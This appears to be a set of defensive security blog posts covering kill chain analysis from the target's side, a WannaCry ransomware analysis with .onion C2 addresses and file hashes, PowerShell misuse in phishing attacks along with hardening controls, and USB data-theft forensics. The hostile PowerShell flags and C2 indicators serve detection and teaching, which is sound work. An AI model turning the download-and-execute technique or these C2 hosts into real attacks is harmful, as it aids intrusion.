Analysing Kill Chain Phases with Targets Perspective – Part 1

Readers!

As mentioned on my recent LinkedIn update, this is the first blog article in the series. The mission of this series is to provide more insight on Kill Chain phases with Target perspective – meaning, the kill chain is for an Attacker/Advresary and its activities, however there are very few documentation or approaches out there with regards to what Targets should be doing. Yes, Lockheed Martin did provide a very good article with regards to Intelligence driven network defense but we need to ask ourselves how practical is to apply the model in our organisation. Consider following course of action matrix by Lockheed Martin, there will be lot of organisations which are not able to perform most of the actions and even if they do or can, there is not much documentation to how to implement these actions appropriately.

Screen Shot 2017-07-01 at 1.26.04 pm

Source : Lockheed Martin

Mission of the blog is to understand what other steps attackers/adversaries take and as a target what we are suppose to do. At the end of series, the goal will be to create hybrid (that also matches with Kill Chain) phases of attacker/adversaries.

Every attacker/adversary has an INTENT and MOTIVE to perform an attack. From highly sophisticated to script kiddies they have certain objectives. This means the attacker first need to find their targets. So for me the first phase should be Target Determination or Determining a target, that fits attackers/adversaries objectives. We can distribute attackers/adversaries into two groups :

  1. Insiders – Disgruntled ex-employee/employees,
  2. Outsiders – Nation State attackers, cyber criminals, script kiddies, hacktivists etc.

Few motivations :

  1. Financial gain
  2. Fame or generate vouches – Require to gain trust of underground or group of hackers
  3. Damage or disrupt services
  4. Cyber espionage
  5. Personal grievances.
  6. Political motivation

Intentions are sometimes hard to prove, but mostly our adversaries will have malicious intentions.

And thus, before selecting a target, they will definitely decide a or multiple targets that fits into their motivations or lets say objectives. Only after deciding a Target, they will perform Reconnaissance or Target Profiling. Now, where the attackers/adversaries look is depending on the target. Target can be a single entity or an organisation or a nation/country.

Single entity as a target – For example a CEO. Intention is to get close and get as much as information that can be collected for that person.

  1. Social media and social mentions.
  2. Target habits with regards to their lifestyle.

Organisation as a target

  1. Social media and social mentions.
  2. Technical information about the organisation. This fits into applications facing externally.
  3. Known and publicly announced breaches.
  4. Information about the organisation data dump on public/private web.

Nation/Country as a target – This is politically motivated and intentions are mostly malicious towards harming the nation or a country. Recent example – NotPetya malware attack to Ukraine. Here, attackers/adversaries understood their target and profiled them and launched the attack.

In all cases, the better an attacker/adversary profiles their target the better the attack will be.

Question is how can a Target use this. Compared to an organisation, adversaries have to actually gather a lot information before an attack about an target, however an organisation knows all that information but is not using the information for their own benefits.

“Charity begins at home and intelligence begins with your logs”

This means when attackers/adversaries spend days, weeks or months to collect information about their target, as an organisation for example, you already have this information but,  not using to gain tactical advantage over our adversaries. So what should a targets do ?

  1. Should know type of information available publicly and understand the risk and how it can be used by an attacker and type of attacks that can leverage these information.
  2. Must know type of information available in underground/private forums or websites and understand he risk and how it can be used by an attacker and type of attacks that can leverage these information.
  3. Must action on any successful breaches and data exfiled. If email address were seen on pastebin don’t just change credentials but also understand that these email addresses can be used for phishing or spoofing. Ideal is to change email address and convert the breached one into honeypot email addresses. This will help understand type of attackers targeting your organisation.
  4. It is ideal to know how your security controls are responding to inbound reconnaissance attempts. The information that they send back can also be used to map the network or understand type of device that is stopping adversaries. For example inbound scan blocked by firewall and responding with ICMP network unreachable message.
  5. Websites such as Google and Shodan can be used to collected lot of information about a target and therefore should be monitored. Especially accidental upload by internal employees. Eg – Employee uploading an excel sheet with organisation data on VT, just to make sure there is no malware. Pro-actively monitoring this can assist us to contact respective parties to take the data offline before entities with malicious intent get there hands on.

Red team assessment are very good place to start with mentioned points above. Organisation can also engage their security operations or security service providers to perform these actions. Frequency depends on organisations capability to invest in resources.

With this I will end part 1.

Have a good weekend!

Advertisements

Yet another WanaCry Ransomware – Analysis

Recently, organizations are being targeted with new ransomware labelled as WanaCry.

Being curious, I downloaded the sample to understand how the malware actually behaved. The tests were performed on VM connected to internet and NOT connected to the internet. In both tests, machine was successfully infected.

Sample analysed : 84c82835a5d21bbcf75a61706d8ab549

As seen in the screenshot the executable is “Wana Decryptor 2.0”.

Following screenshot shows the process tree.

Screen Shot 2017-05-17 at 3.03.50 pm

In the screenshot above, the malware creates taskhsvc.exe which contains TOR data and the CnC server addresses :

  • 57g7spgrzlojinas.onion
  • gx7ekbenv2riucmf.onion

Looked at the dump file for @WanaDecryptor@.exe and identified same domains with additional .onion sites

  • xxlvbrloxvriy2c5.onion
  • 76jdd2ir2embyv47.onion
  • cwwnhwhlz52maqm7.onion

Malware using .onion domains for CnC communications is a technique to stay resilient.

The sample, in my opinion, is a packer/installer that unpacks files shown in below screenshot and also creates @WanaDecrypto@.exe that continuously runs as a process. It is worth noting the folder “msg” and “TaskData” were created when VM was infected connected to internet connection. I will explain each file in the later section.

Executable when connected to internet creates two additional folder
called “msg” and “TaskData”.

Below are MD5 of the files that were in the “TaskData” Folder.

MD5 (./TaskData/Tor/libeay32.dll) = 6ed47014c3bb259874d673fb3eaedc85
MD5 (./TaskData/Tor/libevent-2-0-5.dll) = 90f50a285efa5dd9c7fddce786bdef25
MD5 (./TaskData/Tor/libevent_core-2-0-5.dll) =
e5df3824f2fcad0c75fd601fcf37ee70
MD5 (./TaskData/Tor/libevent_extra-2-0-5.dll) =
6d6602388ab232ca9e8633462e683739
MD5 (./TaskData/Tor/libgcc_s_sjlj-1.dll) = 73d4823075762ee2837950726baa2af9
MD5 (./TaskData/Tor/libssp-0.dll) = 78581e243e2b41b17452da8d0b5b2a48
MD5 (./TaskData/Tor/ssleay32.dll) = a12c2040f6fddd34e7acb42f18dd6bdc
MD5 (./TaskData/Tor/taskhsvc.exe) = fe7eb54691ad6e6af77f8a9a0b6de26d
MD5 (./TaskData/Tor/tor.exe) = fe7eb54691ad6e6af77f8a9a0b6de26d
MD5 (./TaskData/Tor/zlib1.dll) = fb072e9f69afdb57179f59b512f828a4

Folder “msg” contains language packs which also gets encrypted and gets
extension “.wnry”.

Below are the files that were created :

  1. @Please_Read_Me@
  2. @WanaDecryptor@.exe
  3. 00000000.res
  4. c.wnry – contains links to .onion sites and tor browser
  5. f.wnry – List of random files that are encrypted
  6. u.wnry – @WanaDecryptor@.exe decrypter file
  7. b.wnry – bitmap file containing decryption details
  8. r.wnry – some more information about decryption and instructions for the decryption tool
  9. s.wnry – Tor zip file
  10. t.wnry – encryption format instructions
  11. 00000000.eky – Infected machines private RSA key
  12. 00000000.pky – Microsoft public key – RSA 2048
  13. 00000000.res — Data for C2 communication
  14. taskdl.exe – file deletion tool
  15. taskse.exe – enumerates RDP connection and executes malware – TOR process runs underneath
  16. msg – language packs. See screenshot below.

  17. TaskData – TOR browser executable and other files. See screenshot below.

When the malware got executed it queried following domains :

– tor.relay.wardsback.org
– tor.ybti.net
– javadl-esd-secure.oracle.com
– belegost.csail.mit.edu
– tor1.mdfnet.se
– zebra620.server4you.de
– maatuska.471.se

System also communicated to 212.47.241.21 which resolves to sa1.sblo.ch. Ran the malware again and this time it went to different domains :

– tor.dizum.com
– tor1e1.digitale-gessellschaft.ch
– lon.anondroid.com

This could likely be due to malware using TOR. Analysed TOR process and saw multiple IP addresses hard-coded. Here you can find all the directory servers used by TOR.

Extensions that are getting encrypted :

Screen Shot 2017-06-11 at 1.10.12 am

Extract from PE Explorer :

Screen Shot 2017-06-11 at 12.58.42 pm

Extract from Sysmon can be found sysmon logs.

WannaCry Fact Sheet – Here.

Kill-chain Phases – Here.

Final Words :

  1. The malware was not delivered via phishing, but rather via EternalBlue Exploit, taking non-traditional way of infecting systems.
  2. No obfuscation was done – meaning when you open the executable you can see the functions.
  3. Exploit such as EthernalBlue, suggests that getting access to vulnerable systems with user interaction is available. The only we detected this was attacker actually use EternalBlue exploit for financial gain – WannaCry ransomware – however, others can just gain access to the system and perform other tasks. Motive, based on evidence, is financial gain.
  4. Although, patching of systems would have definitely helped, however, we must understand the exploit was only used after dump by Shadow Brokers. Although, the intention of the group would be to expose NSA and its tools, the exploit was used for financial gain. So, may be intention to expose NSA may have been for good, it just did more damage.
  5. Number of articles says that creator of malware made mistakes and they just earned 55 K. However, one must understand all those money are paid ransomware and one must also understand the affects/impact of the malware attack. Although, we cannot quantify the time spent to patch the systems, re-image infected systems, people not being in production globally, it is not small. Although, some analysis suggests that attackers were not sophisticated, but it worked.
  6. Can host based security controls would have helped? Controls such as Application whitelisting, no admin rights to logged in users, use of AppLocker in Windows may have helped in reducing the impact. However, how feasible is to apply this in a corporate environment ?

 

PowerShell : Tool for Admins and Adversaries

Readers!

From last couple of weeks I have been doing some analysing of malware. Mostly, are via phishing attempts. What our adversaries are doing is to first gain easy access to the machine via phishing and creating background processes that calls the compromised domains that downloads the executable, packed with malicious payload. Below is basic timeline of a phishing email with attachment.

timeline

The technique is neither new or unique, however if we are to come up with a trend we can see that most of them have similar tools and procedures.One such tool is PowerShell. The blog is not about what PowerShell is, but how our adversaries are using the tool that was just created to automate admin tasks within Windows environment. As automation is was one of the key points PowerShell was given scripting. The scripting allows to automate admin tasks such as configuration management etc. Here I go explaining what PowerShell is.

Microsoft definitely didn’t intended the tool to be security aware, and therefore till this date one can use PowerShell to perform malicious activities. However, certain controls or functionality within PowerShell can assist us in controlling type of scripts that can run on the systems.

There are indeed multiple security controls that we will discuss later in the blog but first let’s see what our adversaries are doing. I will not be going in specific analysis of a malware as I am trying to reach out to the teams which are responsible to detect/prevent these type of attacks by placing feasible and actionable security controls with regards to PowerShell.

Below is a sample PowerShell command seen in most cases :

ps-command

Frequently used parameters :

  1. ExecutionPolicy bypass – Execution policies  in  PowerShell determines whether a script can run and what type of scripts can run and also sets default policy. Microsoft added a Flag called ‘bypass’, which when used bypasses any currently assigned execution policy and runs the script without any warnings. There are 4 types of Execution policies:
    1. Restricted
    2. Unrestricted
    3. AllSigned
    4. RemoteSigned
  2. windowstyle hidden – This parameter is used when PowerShell script requires to be run in background without the users knowledge.
  3. noprofile – PowerShell profile are set profile or commands (it is actually a PowerShell script), normally for current user and host. Setting -noprofile will just launch any script and will not look for profiles.
  4. DownloadFile – For downloading the file via web

Tools, Technique and Procedures:

  1. The attachments as shown in the first screenshot, are mostly Word/Excel doc with Macros or zip files with JavaScripts.
  2. The Macros or JS are heavily obfuscated and sometimes lightly. For heavily deobfuscated scripts I rely on dynamic analysis(the best way to know what malware is written for). Some scripts, due to practice, I can deobfuscate within minutes.
  3. PowerShell command to download the file are mostly on sites with HTTP rather on HTTPS (there are some sophisticated adversaries created/compromised HTTPS websites). Sometimes, also have noticed use of cmd.exe /c being used which will invoke specified command and terminates it.
  4. File on the compromised domain are mostly windows executables with ‘.exe’ or sometimes the extension is hidden. This depends on the adversary and the packers that they have used. Sometimes, you can unpack the ‘exe’ via 7zip.
  5. Based on the commands the file will be first downloaded and executed. In certain cases I have seen the file gets deleted after execution. Again, it depends on the command.
  6. Most malwares that I have analysed were either ransomware or trying to steal information and sometimes combination of both.

Above TTPs are very simple to understand however, implementing security controls, lets say for each steps to detect and prevent, is much harder. We as a team or individual are working towards reducing the impact of the incident. Consider the phases of cyber kill-chain and perform an analysis of incidents within your team, and understand at which phase you are able to catch the adversary and can you do that earlier?

Observables such as IP addresses, domains, URLs and file hashes with context are the IOCs that normally we look for and use it for detection and prevention. Some people call that Threat Intelligence. Darwin would have gone here Seriously?

download

Security controls such as Endpoint solutions, Proxy, IDPS and FW can help us but they are heavily dependent on what they know and history has shown us that they can be bypassed. However, they are indeed very good controls to either reduce the impact and/or preventing the known attacks or IOCs.

What we need is security controls based on TTPs. So let’s see some of the following controls that can be implemented to either detect and/or prevent such attacks :

  1. DO NOT give admin privileges to the local account. If required based on their role give have a Admin pass generator with User Access Control (UAC) enabled, that will prompt to enter password for Administrator every time a system change such as installing a program, running an Admin task etc is created.
  2. Group policies to have certain tasks especially script execution and writing to registry and windows directory only allowed by Administrator. Can use Administrative Templates.
  3. Group policy to not allow any executables in TEMP directory to be saved/executed.
  4. Sign all PowerShell script. If not possible or the team not willing to sign at restriction placed via above mentioned points can assist.
  5. Can also set the Execution Policy to Restricted, PowerShell can only be used interactively to run the script. Organisation who are not pushing any policies via PowerShell can choose this option.
  6. Application whitelisting – Windows AppLocker. The tools can assist to define what level of access a user can have on the system with regards to executables, scripts and DLLs.
  7. Having AppLocker in Allow Mode can assist the team with a rule that only scripts at trusted location can run on the system. A attacker can re-write the rule provided, he/she has access on the system with Admin privileges.
  8. PowerShell Language Mode – Admin can setup the language modes to Constrained Language Mode that permits all Windows cmdlets and all Windows PowerShell language elements, but it limits permitted types. It has list of types that are allowed within a PowerShell script. For example, New-Object type cmdlet can only be used with allowed types which does not contain system.net.webclient.
  9. Logging of PowerShell is also important. Here, in my opinion Sysmon is a must have. The logs can be forwarded to SIEM for correlation. If Sysmon is not feasible, enabling PowerShell Module logging is highly recommended. Enhanced logging is always recommended and will  write another blog on that.
  10. Organisation proxy to be configured properly to detect/prevent web request invoked via PowerShell. Have tested with command Invoke-request that can show WindowsPowerShell within User-Agent. However, no User-Agent string is noted when above mentioned to DownloadFile is used. May be Proxies can be configured to disallow any traffic without User-Agent – still have to verify whether such functionality exists. If not a SIEM rule can be used to alert on web traffic that has no User-Agent string, going to external sites and downloading files.

Please note, that AppLocker and Powershell constrained mode are not security feature but another layer of defense which can help to reduce the impact of the attack and in some cases completely prevent the execution of foreign scripts.

When making a business case to the board or C-Level executives to make any changes in the organisation the presenter should use language they understand. As part of the evidence it highly recommended to show actually incidents where current security controls failed which impacted the productivity of the user, loss of data and hours spent to recover and restore systems. They want to know how any new mentioned or suggested changes will help in reducing impact to the user or business.

If there are other methods that other organisations are using please let me know.

A good read – PowerShell for Blue Team

 

Finding Evidence of Data Exfil – USBStor artefacts

Readers!

Last year one of the member on SANS DFIR posted a question with regards to identifying whether there was any data leakage occurred in the environment via a USB thumb drive. As for the evidence investigator had USBStor artefacts. Shell bag analysis(TZ Works sbag) showed a large number of files touched (reg-UTC) within a very short time period and a few with the MRU (Most recently used list) flag set with different times.

This blog is a concise article of the tips provided by myself and other members. Provided tips assisted the investigator to support the theory of data leakage.

  1. Evaluating USB dates as a group.  If any number of artefacts is detected with the same exact time stamp, investigate it further. Having such artefacts indicates that they were somehow modified. It is also, worth the effort to carve the data for deleted registry files and look for relevant keys there.
  2. Normal users will/may access the files again after copying to any removable media to make sure the files were copied correctly and are not corrupted. This operation leaves shell items in the form of shell bags and link (.lnk) files. One can use Windows Time Rule to for evidence of file copy. Using the time rule examine the link files with target data pointing to files on removable media (tz works ‘lp’ is excellent for this). If the modified date of the target file data in the link file precedes the created date of the target file data in the link file, then this is an indication that the file was opened from the removable media, after the file was copied to the removable media. This means that even without access to the removable media, you can state that files were copied to the removable media and then they were opened from the removable media. The created date of the target data in the link file is when the file was copied to the removable media. One can state that the files were copied, but cannot state where the file was copied from, as that is not tracked.
  3. Now to determine when the file was opened from the removable media, look at the times of the link file itself. The created date of the link files will be the first time the file was opened and the modified date of the link file will be last time the file was opened. To discover the removable media, locate the volume serial number of the removable media’s file system which will be stored in the link file’s data. Correlate the volume serial number to the data from your USB drive analysis and you will get the manufacturers unique serial number for that removable media. Find that unique serial number across your enterprise and you will discover other machines where that drive was connected to. Correlate the link file target data to the shell bag data and you should be able to get a neat timeline of what happened on the system.
  4. Memory analysis of the system can assist. If the files were copied it should have data on the clipboard. Drag and drop will not likely have any artefacts.
  5. Registry hives –  one can use FTK registry viewer for ease. Usbstor have last written values – dates when the last device was accessed or connected.
  6. Look at the recent files in Windows section. Although if one is not able to open the file it may show which file from which volume – it may not prove that file was copied however if the document name is ‘organisationconfidential‘ than you can argue what was the file doing on USB? The link files should also contain volume serial that one can match/compare with removable media serials.
  7. Registry restore points can also be used to check last written dates.
  8. Look at the MFT records – they have sourceMFT and destinationMFT.

Tools mentioned : SBE – Shellbag Explorer and MFTparser

Links mentioned :

https://files.sans.org/summit/Digital_Forensics_and_Incident_Response_Summit_2015/PDFs/PlumbingtheDepthsShellBagsEricZimmerman.pdf

 

Hash Values – A Trivial Artefact

Readers!

Merry Christmas and Happy new year to all. The days of holiday spam and vendor predictions are here.

Here I am spending summer afternoon watching TV and writing on my blog. As I am bit lazy during holidays I am posting something simple. The post is about HASH values and how trivial they are in identifying malicious files/programs.

You can read about Hash here.

Hash values are important to first verify the files. Think of it as a signature or footprint. As living beings has a signature or footprint that we can recognise them from, similarly files  have something called digital footprint that we can identify them from.

Take example of HashCalculator. Following screenshot shows different hash values of HashCalc.exe.

hashcalc

As you can see HashCalc provides lot of information (digital footprint) of its own. With regards to security the hashes are normally used to verify the file as mentioned earlier. Let’s look at the output in brief for commonly used hash values :

  • MD5 – Based on Message Digest algorithm. Normally represent as 32 hexadecimal digits. Vulnerable to collision attacks. Read further here.
  • SHA-1 – Secure Hash Algorithm 1. Represented as 40 digit hexadecimal digits. Generates 160 bits message digest. Vulnerable to collision attacks. No longer in use and has been replaced by SHA-2 and SHA-3. Read further here.
  • SHA-256 – Secure Hash Algorithm 2. Represented as 64 digit hexadecimal digits. Generates six digests – SHA-224, SHA-256, SHA-384, SHA-512, SHA-512/224, SHA-512/256. Read further here.

Now, why the blog entry. The information is available on google and Wikipedia. Reason for the blog is Hash values are considered trivial/important in Threat Intelligence and/or cyber security world. Lots of OSINT, vendor intelligence systems share hash values of known malware dropper. This could be an executable, MS office document, Adobe document, image files etc.

Following are few scenarios where Hash values can assist :

  • Hash values can assist in identifying whether the file/program that we have is legitimate or not.
  • Lot of malware analysis blogs will always provide Hash value of identified file/program.
  • The Hash value is also used by Endpoint solutions to detect known malicious files/programs.
  • During Incident Response, one can also use Hash values in YARA rules to detect any malicious files/programs.
  • Organisations can have a list of program with the Hash values of known good  and authorised programs in their organisation, which than can be used to identify any unwanted programs on the system, either via endpoint for real time detection and/or during incident resposne. Benchmarking/Baselining is a complicated process and sometimes not feasible in large organisations.

NIST provides list of known good hash values of legitimate programs, that one can use to compare good vs bad. Read here.

Hash values are just another indicator that gives more targeted detection of malicious files/programs. IP address and URLs are dynamic, not 100% reliable and have low confidence level as a Threat Indicator and therefore Hash values is considered important artefact in Security world.

Happy Holidays!

 

SANS FOR578 Cyber Threat Intelligence – Course Review

Readers!!!

Advanced greetings for Christmas. Before I start make sure to check out SANS Holiday Hack Challenge here.

Recently, I was honoured to attend one of the SANS course For578 – Cyber Threat Intelligence. SANS instructor was one of the best in business Robert M. Lee. My reason to attend SANS training is purely because they are one the best security training provider, and when they announced FOR578 last year I was very keen in SANS take on Threat intelligence. I have been self-learning about threat intelligence via Lockheed Martin, various webcasts via SANS and other providers and realised that every vendor has different approach with Threat Intelligence.

I had prior knowledge Threat Intelligence and this course helped to me to get the best out of it.

After the end of the first day, I was having a very good understanding with what Intelligence is and how it is associated with Cyber Threats. Most of the time, in name of Threat Intelligence, vendors or service providers end up sharing Threat Indicators with some nice dashboards and portray the system as Threat Intelligence system. I have always been saying we need to move beyond Indicators based systems (yes its still good to have those), and concentrate more on Tools, Techniques and Procedures of our adversary. The content of the course actually aligned with my thinking and helped in better carve my thinking and actually implement in real life.

During the course, I learned how to track a threat actor or a campaign and how to best showcase that information across your organisation. Tools such as CRITS, MISP, Threat_note were used. Kill-Chain model and Diamond Model were explained in detailed and LABS were designed in way to implement these models.

One of the interesting LAB was to review vendor Threat Intelligence report. The report could be regarding a APT, analysis of an threat actor or generic briefings across the global related to Cyber Threats. In this exercise, we learned about biases and how multiple input to one single report may change the actual outcome of the report or identification of adversary.

Other LABS were related to extracting intelligence out of vendor reports, tracking a campaign and what artefacts to collects during intelligence exercise and how to provide evidence to your hypotheses. LABS that concentrated in how to share Threat Information via STIX, YARA and OpenIOC. The course has very good real life case studies with regards to Thr

At the end of the fifth day, I knew what actual Threat Intelligence means and how we can use that in our organisation.

For those who are thinking to take the course, would highly recommend to take it.

Evoltin POS Malware – Kill Chain Mind Map

Readers!!!

Its been quite a while I have updated my blog posts, due to me spending  some quality time off the work and being with family.

Recently, was honoured to attend SANS FOR578 Cyber Threat Intelligence course taught by Robert M. Lee and it was excellent. I will be writing a separate blog post reviewing the course later.

Being on customer service environment, I have realised how important data visualisations are. When you are presenting your findings to C Level Executives, having tables, charts and graphics in the report, makes it easier to grasp and understand analyst ( or whoever wrote the report) point of view. We can visualise our findings about Organisational Risks, Threats, Incidents and many other departmental attributes in different manner.

For me, best visualisation is Mind Maps and I have used them to represent process, procedure, incidents etc. I also, use mind maps, when I am performing any investigations on incidents during IR, Forensics and/or Threat Hunting. It helps me track investigation steps and my findings. If the incident continues or the next business day, the mind map, helps me to start where I left, and also helps me trace back my steps rather looking at excel sheets or other textual representation or a case management system.

During the course, there was a good stress on making sure investigation or intelligence gathering information is represented in a manner that all levels of audience can understand. This is when I thought to create a mind map of a malware and its behaviour and how it can be represented on Kill Chain phases.

evoltin-pos-aka-nitloveposb

Above screenshot shows Kill Chain phases for Evoltin POS Malware and indicators that were identified during analysis and how they can associated to different Kill Chain phases. Rather presenting them on table or chart format, I believe the view via mind map is much more easy to grasp and better presented.

I will be creating more mind maps and uploading to my GitHub account. I normally, update IOC’s to Alienvault OTX, Blueliv, GitHub and ThreatConnect, but now I will also create similar Kill Chain Mind Map for every investigation I do.

Happy Mind Mapping!!!!!